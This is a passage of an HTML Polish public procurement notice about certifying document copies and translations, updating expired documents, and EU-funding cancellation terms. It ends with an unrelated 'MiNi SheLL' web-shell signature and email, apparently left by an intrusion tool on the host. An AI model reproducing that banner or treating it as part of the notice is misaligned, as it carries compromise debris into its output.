3)	sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym ZA ZGODNOŚĆ Z ORYGINAŁEM przez Wykonawcę,
4)	składane przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia - kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów mogą być poświadczane ZA ZGODNOŚĆ Z ORYGINAŁEM przez Wykonawcę lub te podmioty.
5. Jeżeli termin składania ofert ulegnie przesunięciu, wówczas dokumenty, które do tego czasu utraciły swą ważność winny zostać uaktualnione.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com